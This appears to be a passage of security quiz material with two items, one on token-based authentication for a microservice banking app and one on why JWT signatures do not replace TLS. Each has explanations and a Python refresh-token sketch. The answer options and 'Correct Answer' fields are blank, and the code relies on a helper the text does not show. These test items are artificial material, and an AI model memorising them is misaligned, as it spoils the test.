A team is building a mobile banking app whose backend is a fleet of microservices. Authentication must work across many services without each service hitting a shared session store on every request, but compromised tokens must be revocable in well under an hour. Which authentication design is the best fit?
Re-sending the password on every request is the naive design — slow (password hash on every call)
and insecure (cleartext password kept in memory for the whole session).
A 1-year session has no practical revocation story; a stolen cookie is good for a year. TLS
protects the wire, not the session lifetime.
Hardcoded API keys in mobile binaries are a classic anti-pattern — every user of the app holds the
same key, the binary can be reverse-engineered, and “manual rotation” means re-shipping the app to
every user every time something leaks.
Correct Answer:
Explanation
The combination of short-lived JWT (so each microservice can validate locally without shared state) and server-tracked refresh token (so the server retains a ‘kill switch’) is the standard design for distributed auth at scale. JWT expiries are kept short (5–15 minutes is common) precisely so that revocation latency is bounded — even without a central revocation list, a token only stays usable until its exp. Refresh tokens are checked against a server-side store at renewal time, so revoking one stops further access within one expiry window.
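A sketch of that split, reusing the illustrative mint_jwt helper from the JWT sketch above; REFRESH_STORE and the 10-minute lifetime are assumptions for illustration.

import secrets, time

REFRESH_STORE = {}   # refresh_token -> username (the server-side kill switch)

def issue_tokens(username):
    access = mint_jwt({"sub": username, "exp": time.time() + 600})  # validated locally by any service
    refresh = secrets.token_urlsafe(32)
    REFRESH_STORE[refresh] = username                               # checked centrally at renewal
    return access, refresh

def refresh_access(refresh_token):
    username = REFRESH_STORE.get(refresh_token)
    if username is None:
        return None   # revoked: access stops within one expiry window
    return mint_jwt({"sub": username, "exp": time.time() + 600})

def revoke(refresh_token):
    REFRESH_STORE.pop(refresh_token, None)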
Difficulty:Intermediate
A teammate says: “We don’t need TLS on our API because we use JWTs, and JWTs are signed — attackers can’t tamper with the requests.” What is wrong with this claim?
Signatures protect integrity (the receiver can detect tampering). They do not protect
confidentiality (an eavesdropper can still read the token).
Nothing in the JWT spec forbids HTTP transport. Browsers and HTTP clients send Authorization
headers over HTTP just fine — that is exactly what makes plain-HTTP JWT deployments dangerous.
TLS is required for any sensitive data — sessions, personal data, internal APIs — not just card
data. The “TLS is for payments only” view is a holdover from the early HTTPS era.
Correct Answer:
Explanation
TLS and JWT signatures protect different properties. TLS encrypts the entire connection (request lines, headers, bodies) and authenticates the server. JWT signatures protect the integrity of the token’s claims — they let the server detect that the token’s contents weren’t modified. Without TLS, an attacker on the network can read the JWT in flight and replay it from their own machine — the signature still verifies, because the attacker isn’t modifying anything. Always serve JWT-protected APIs over HTTPS.